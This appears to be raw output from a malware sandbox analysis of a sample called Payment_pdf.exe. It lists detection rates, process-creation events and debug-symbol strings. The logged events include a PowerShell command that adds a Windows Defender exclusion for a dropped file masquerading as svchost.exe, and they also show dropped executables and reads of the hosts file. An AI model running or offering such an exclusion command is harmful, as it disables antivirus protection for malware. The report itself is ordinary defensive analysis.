                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Payment_pdf.exeVirustotal: Detection: 26%
                  Source: Payment_pdf.exeReversingLabs: Detection: 21%
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile read: C:\Users\user\Desktop\Payment_pdf.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Payment_pdf.exe 'C:\Users\user\Desktop\Payment_pdf.exe'
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Users\user\Desktop\Payment_pdf.exe C:\Users\user\Desktop\Payment_pdf.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6968 -ip 6968
                  Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 2032
                  Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe'
                  Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                  Source: unknownProcess created: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe'
                  Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe'
                  Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe'
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe 'C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe 'C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess created: C:\Users\user\Desktop\Payment_pdf.exe C:\Users\user\Desktop\Payment_pdf.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6968 -ip 6968
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 2032
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe'
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\Payment_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: Payment_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Payment_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Payment_pdf.exe, 00000000.00000002.408646291.0000000000AA0000.00000004.00000020.sdmp
                  Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb: source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: ore.ni.pdb" source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdba source: Payment_pdf.exe, 00000000.00000002.408646291.0000000000AA0000.00000004.00000020.sdmp
                  Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: clr.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: .ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: ntmarta.pdbC source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: ility.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: wuser32.pdbj source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: onp1jVisualBasic.pdb$V source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408487422.0000000000A73000.00000004.00000020.sdmp
                  Source: Binary string: fltLib.pdbXb source: WerFault.exe, 0000000F.00000003.432301170.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.pdbz source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.ni.pdbT3cl source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: WinTypes.pdb+ source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408646291.0000000000AA0000.00000004.00000020.sdmp
                  Source: Binary string: msvcp_win.pdbR source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: nsi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: Payment_pdf.PDB4 source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: Accessibility.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: shell32.pdbH source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.pdbF source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wimm32.pdbl source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.432423021.0000000004C84000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdbT source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: version.pdb0 source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: indows.Forms.pdb? source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: cldapi.pdb! source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: rawing.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: cryptsp.pdbx source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: (P&jLC:\Windows\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: clrjit.pdb^ source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: oleaut32.pdb< source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: edputil.pdb9 source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb$fc source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: System.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb> source: Payment_pdf.exe, 00000000.00000002.408678718.0000000000AAE000.00000004.00000020.sdmp
                  Source: Binary string: System.Core.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: rasman.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: o.pdb)X source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: msasn1.pdb[ source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.ni.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: nsi.pdbxj source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdbF source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: C:\Users\user\Desktop\Payment_pdf.PDB source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: psapi.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Payment_pdf.exe, 00000000.00000002.408285568.0000000000A2D000.00000004.00000020.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: bcrypt.pdbv source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: combase.pdbk source: WerFault.exe, 0000000F.00000003.432423021.0000000004C84000.00000004.00000040.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
